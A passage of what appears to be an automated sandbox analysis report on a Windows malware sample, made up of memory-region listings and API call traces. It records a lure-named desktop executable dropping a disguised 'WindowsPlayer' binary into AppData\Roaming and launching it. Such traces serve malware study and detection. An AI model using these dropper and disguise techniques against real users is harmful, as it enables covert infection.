"c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 422 start_va = 0x1ac20000 end_va = 0x1ac33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000006.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000006.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000006.db") Region: id = 423 start_va = 0x2190000 end_va = 0x2190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002190000" filename = "" Region: id = 424 start_va = 0x7fffca0b0000 end_va = 0x7fffca0cefff monitored = 0 entry_point = 0x7fffca0b8ca0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 425 start_va = 0x1ace0000 end_va = 0x1addffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ace0000" filename = "" Region: id = 426 start_va = 0x1aeb0000 end_va = 0x1aebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aeb0000" filename = "" Region: id = 427 start_va = 0x7fffb6ac0000 end_va = 0x7fffb6ae3fff monitored = 0 entry_point = 0x7fffb6ac1790 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 428 start_va = 0x7fffca220000 end_va = 0x7fffca26cfff monitored = 0 entry_point = 0x7fffca233280 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 429 start_va = 0x1aec0000 end_va = 0x1afbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aec0000" filename = "" Region: id = 430 start_va = 0x1afc0000 end_va = 0x1b104fff monitored = 0 entry_point = 0x1b01a9b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 431 start_va = 0x1afc0000 end_va = 0x1b0bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001afc0000" filename = "" Region: id = 432 start_va = 0x1b0c0000 end_va = 0x1b1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b0c0000" filename = "" Region: id = 433 start_va = 0x1b1c0000 end_va = 0x1b2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b1c0000" filename = "" Region: id = 434 start_va = 0x1b2c0000 end_va = 0x1b3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b2c0000" filename = "" Region: id = 435 start_va = 0x1b3c0000 end_va = 0x1b4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b3c0000" filename = "" Region: id = 436 start_va = 0x21a0000 end_va = 0x21a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021a0000" filename = "" Region: id = 437 start_va = 0x7fffbd920000 end_va = 0x7fffbda65fff monitored = 0 entry_point = 0x7fffbd927620 region_type = mapped_file name = "windows.staterepositoryps.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryPS.dll" (normalized: "c:\\windows\\system32\\windows.staterepositoryps.dll") Region: id = 528 start_va = 0x7fffc15c0000 end_va = 0x7fffc17acfff monitored = 0 entry_point = 0x7fffc163ea20 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 529 start_va = 0x7fffc1960000 end_va = 0x7fffc1c0dfff monitored = 0 entry_point = 0x7fffc19969a0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 530 start_va = 0x7fffca060000 end_va = 0x7fffca090fff monitored = 0 entry_point = 0x7fffca06e380 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 531 start_va = 0x2230000 end_va = 0x2230fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002230000" filename = "" Region: id = 532 start_va = 0x7fffc6f30000 end_va = 0x7fffc7085fff monitored = 0 entry_point = 0x7fffc6f5b240 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 533 start_va = 0x7fffb9f90000 end_va = 0x7fffba01ffff monitored = 0 entry_point = 0x7fffb9ff2720 region_type = mapped_file name = "appresolver.dll" filename = "\\Windows\\System32\\AppResolver.dll" (normalized: "c:\\windows\\system32\\appresolver.dll") Region: id = 534 start_va = 0x7fffc3220000 end_va = 0x7fffc3279fff monitored = 0 entry_point = 0x7fffc32363c0 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 535 start_va = 0x7fffc8d70000 end_va = 0x7fffc8d98fff monitored = 0 entry_point = 0x7fffc8d71bd0 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 536 start_va = 0x7fffca030000 end_va = 0x7fffca05dfff monitored = 0 entry_point = 0x7fffca034f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 537 start_va = 0x7fffc8d40000 end_va = 0x7fffc8d64fff monitored = 0 entry_point = 0x7fffc8d43920 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 538 start_va = 0x1ac40000 end_va = 0x1ac43fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.3.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.3.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\cversions.3.db") Region: id = 539 start_va = 0x1ac50000 end_va = 0x1ac61fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.3.ver0x000000000000001b.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.3.ver0x000000000000001b.db") Region: id = 540 start_va = 0x1ac70000 end_va = 0x1ac73fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.3.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.3.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\cversions.3.db") Region: id = 541 start_va = 0x7fffbe670000 end_va = 0x7fffbe6ecfff monitored = 0 entry_point = 0x7fffbe673a80 region_type = mapped_file name = "onecorecommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecorecommonproxystub.dll") Region: id = 1073 start_va = 0x7fffc4a20000 end_va = 0x7fffc51b0fff monitored = 0 entry_point = 0x7fffc4a35f30 region_type = mapped_file name = "onecoreuapcommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecoreuapcommonproxystub.dll") Region: id = 1074 start_va = 0x7ff4fda00000 end_va = 0x7ff4fdddcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\apppatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1098 start_va = 0x1b4c0000 end_va = 0x1b5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b4c0000" filename = "" Region: id = 1102 start_va = 0x1ac40000 end_va = 0x1ac4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ac40000" filename = "" Thread: id = 1 os_tid = 0x1638 [0171.259] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0172.021] RoInitialize () returned 0x1 [0172.021] RoUninitialize () returned 0x0 [0175.878] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="XcFcvKAEG7NAYbzpz") returned 0x2a4 [0176.022] ExpandEnvironmentStringsW (in: lpSrc="%AppData%", lpDst=0x1aee00, nSize=0x64 | out: lpDst="C:\\Users\\OqXZRaykm\\AppData\\Roaming") returned 0x23 [0176.024] ExpandEnvironmentStringsW (in: lpSrc="%AppData%", lpDst=0x1aee00, nSize=0x64 | out: lpDst="C:\\Users\\OqXZRaykm\\AppData\\Roaming") returned 0x23 [0176.122] EtwEventRegister () returned 0x0 [0176.130] EtwEventSetInformation () returned 0x0 [0176.156] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\Desktop\\READ ME! (List of free things).exe.config", nBufferLength=0x105, lpBuffer=0x1ae700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\Desktop\\READ ME! (List of free things).exe.config", lpFilePart=0x0) returned 0x44 [0176.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1ae958) returned 1 [0176.159] GetFileAttributesExW (in: lpFileName="C:\\Users\\OqXZRaykm\\Desktop\\READ ME! (List of free things).exe.config" (normalized: "c:\\users\\oqxzraykm\\desktop\\read me! (list of free things).exe.config"), fInfoLevelId=0x0, lpFileInformation=0x1aec80 | out: lpFileInformation=0x1aec80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0176.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1ae908) returned 1 [0176.349] GetLocaleInfoW (in: Locale=0x9, LCType=0x1, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 5 [0177.107] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x1aef20 | out: pfEnabled=0x1aef20) returned 0x0 [0177.327] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ade58 | out: phkResult=0x1ade58*=0x0) returned 0x2 [0177.327] RegCloseKey (hKey=0xffffffff80000002) returned 0x0 [0177.334] GetFullPathNameW (in: lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", nBufferLength=0x105, lpBuffer=0x1ae930, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", lpFilePart=0x0) returned 0x52 [0177.334] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aee48) returned 1 [0177.335] CreateFileW (lpFileName="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa0 [0177.341] GetFileType (hFile=0xa0) returned 0x1 [0177.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aedb8) returned 1 [0177.341] GetFileType (hFile=0xa0) returned 0x1 [0177.344] WriteFile (in: hFile=0xa0, lpBuffer=0x122bfb50*, nNumberOfBytesToWrite=0x33000, lpNumberOfBytesWritten=0x1aef58, lpOverlapped=0x0 | out: lpBuffer=0x122bfb50*, lpNumberOfBytesWritten=0x1aef58*=0x33000, lpOverlapped=0x0) returned 1 [0177.353] CloseHandle (hObject=0xa0) returned 1 [0177.487] LocalAlloc (uFlags=0x0, uBytes=0xa6) returned 0x552990 [0178.979] ShellExecuteExW (in: pExecInfo=0x2260cc8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2260cc8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x574)) returned 1 [0184.631] LocalFree (hMem=0x552990) returned 0x0 [0184.750] CoGetContextToken (in: pToken=0x1afc30 | out: pToken=0x1afc30) returned 0x0 [0184.750] CObjectContext::QueryInterface () returned 0x0 [0184.751] CObjectContext::GetCurrentThreadType () returned 0x0 [0184.751] Release () returned 0x0 [0184.753] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x4bf380*=0x124, lpdwindex=0x1afa24 | out: lpdwindex=0x1afa24) returned 0x0 Thread: id = 2 os_tid = 0x888 Thread: id = 3 os_tid = 0x52c Thread: id = 4 os_tid = 0x81c Thread: id = 5 os_tid = 0xd60 [0172.023] CoGetContextToken (in: pToken=0x1a7efa30 | out: pToken=0x1a7efa30) returned 0x800401f0 [0172.023] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0172.023] RoInitialize () returned 0x1 [0172.023] RoUninitialize () returned 0x0 [0184.749] CloseHandle (hObject=0x574) returned 1 [0184.834] EtwEventUnregister () returned 0x0 [0184.854] CloseHandle (hObject=0x2a4) returned 1 Thread: id = 6 os_tid = 0x175c Thread: id = 7 os_tid = 0x1528 Thread: id = 8 os_tid = 0x1524 Thread: id = 9 os_tid = 0x14e0 Thread: id = 10 os_tid = 0x14e8 Thread: id = 11 os_tid = 0xdac Thread: id = 89 os_tid = 0x8d8 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x5c3fb000" os_pid = "0x674" os_integrity_level = "0x4000" os_privileges = "0x260914080" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x264" cmd_line = "C:\\Windows\\system32\\svchost.exe -k appmodel -p" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "S-1-5-80-3369530244-1263555520-1552818992-544823788-1590281562" [0xa], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:000128c3" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 438 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 439 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 440 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 441 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 442 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 443 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 444 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 445 start_va = 0x100000 end_va = 0x108fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 446 start_va = 0x110000 end_va = 0x1d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 447 start_va = 0x1e0000 end_va = 0x1e7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "staterepository-deployment.srd-shm" filename = "\\ProgramData\\Microsoft\\Windows\\AppRepository\\StateRepository-Deployment.srd-shm" (normalized: "c:\\programdata\\microsoft\\windows\\apprepository\\staterepository-deployment.srd-shm") Region: id = 448 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 449 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 450 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 451 start_va = 0x680000 end_va = 0x688fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 452 start_va = 0x690000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 453 start_va = 0x890000 end_va = 0x897fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 454 start_va = 0x8a0000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 455 start_va = 0xa30000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 456 start_va = 0xb00000 end_va = 0xb00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 457 start_va = 0xb10000 end_va = 0xb18fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 458 start_va = 0xb30000 end_va = 0xb37fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "staterepository-machine.srd-shm" filename = "\\ProgramData\\Microsoft\\Windows\\AppRepository\\StateRepository-Machine.srd-shm" (normalized: "c:\\programdata\\microsoft\\windows\\apprepository\\staterepository-machine.srd-shm") Region: id = 459 start_va = 0xb40000 end_va = 0xb40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 460 start_va = 0xb50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 461 start_va = 0xb60000 end_va = 0xb60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 462 start_va = 0xb70000 end_va = 0xb70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 463 start_va = 0xb80000 end_va = 0xb80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 464 start_va = 0xc00000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 465 start_va = 0xe00000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 466 start_va = 0xf00000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 467 start_va = 0x1000000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 468 start_va = 0x1200000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 469 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 470 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 471 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 472 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 473 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 474 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 475 start_va = 0x1a00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 476 start_va = 0x1c00000 end_va = 0x1d3efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 477 start_va = 0x1d40000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 478 start_va = 0x1e40000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 479 start_va = 0x1f40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 480 start_va = 0x2040000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 481 start_va = 0x2140000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 482 start_va = 0x2240000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 483 start_va = 0x2340000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 484 start_va = 0x2440000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 485 start_va = 0x2540000 end_va = 0x263ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 486 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 487 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 488 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 489 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 490 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 491 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 492 start_va = 0x7ff612ac0000 end_va = 0x7ff612ad0fff monitored = 0 entry_point = 0x7ff612ac4e80 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 493 start_va = 0x7fffaf250000 end_va = 0x7fffaf25ffff monitored = 0 entry_point = 0x7fffaf256080 region_type = mapped_file name = "wifidatacapabilityhandler.dll" filename = "\\Windows\\System32\\wifidatacapabilityhandler.dll" (normalized: "c:\\windows\\system32\\wifidatacapabilityhandler.dll") Region: id = 494 start_va = 0x7fffb1740000 end_va = 0x7fffb174ffff monitored = 0 entry_point = 0x7fffb17460a0 region_type = mapped_file name = "cellulardatacapabilityhandler.dll" filename = "\\Windows\\System32\\cellulardatacapabilityhandler.dll" (normalized: "c:\\windows\\system32\\cellulardatacapabilityhandler.dll") Region: id = 495 start_va = 0x7fffb1770000 end_va = 0x7fffb17d3fff monitored = 0 entry_point = 0x7fffb17b13a0 region_type = mapped_file name = "capabilityaccessmanager.dll" filename = "\\Windows\\System32\\CapabilityAccessManager.dll" (normalized: "c:\\windows\\system32\\capabilityaccessmanager.dll") Region: id = 496 start_va = 0x7fffb1840000 end_va = 0x7fffb187efff monitored = 0 entry_point = 0x7fffb185e5f0 region_type = mapped_file name = "capabilityaccessmanagerclient.dll" filename = "\\Windows\\System32\\CapabilityAccessManagerClient.dll" (normalized: "c:\\windows\\system32\\capabilityaccessmanagerclient.dll") Region: id = 497 start_va = 0x7fffb3890000 end_va = 0x7fffb38e0fff monitored = 0 entry_point = 0x7fffb38c2fd0 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 498 start_va = 0x7fffbd920000 end_va = 0x7fffbda65fff monitored = 0 entry_point = 0x7fffbd927620 region_type = mapped_file name = "windows.staterepositoryps.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryPS.dll" (normalized: "c:\\windows\\system32\\windows.staterepositoryps.dll") Region: id = 499 start_va = 0x7fffbe5b0000 end_va = 0x7fffbe5c9fff monitored = 0 entry_point = 0x7fffbe5b1d80 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 500 start_va = 0x7fffbebf0000 end_va = 0x7fffbec00fff monitored = 0 entry_point = 0x7fffbebf3900 region_type = mapped_file name = "windows.staterepositorycore.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryCore.dll" (normalized: "c:\\windows\\system32\\windows.staterepositorycore.dll") Region: id = 501 start_va = 0x7fffbee80000 end_va = 0x7fffbef30fff monitored = 0 entry_point = 0x7fffbeec6e10 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 502 start_va = 0x7fffbef40000 end_va = 0x7fffbf4c5fff monitored = 0 entry_point = 0x7fffbef97790 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 503 start_va = 0x7fffc6f30000 end_va = 0x7fffc7085fff monitored = 0 entry_point = 0x7fffc6f5b240 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 504 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 505 start_va = 0x7fffc9b80000 end_va = 0x7fffc9baafff monitored = 0 entry_point = 0x7fffc9b82db0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 506 start_va = 0x7fffc9d00000 end_va = 0x7fffc9d11fff monitored = 0 entry_point = 0x7fffc9d055f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 507 start_va = 0x7fffca270000 end_va = 0x7fffca36ffff monitored = 0 entry_point = 0x7fffca285ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 508 start_va = 0x7fffca370000 end_va = 0x7fffca479fff monitored = 0 entry_point = 0x7fffca3a1300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 509 start_va = 0x7fffca480000 end_va = 0x7fffca4fefff monitored = 0 entry_point = 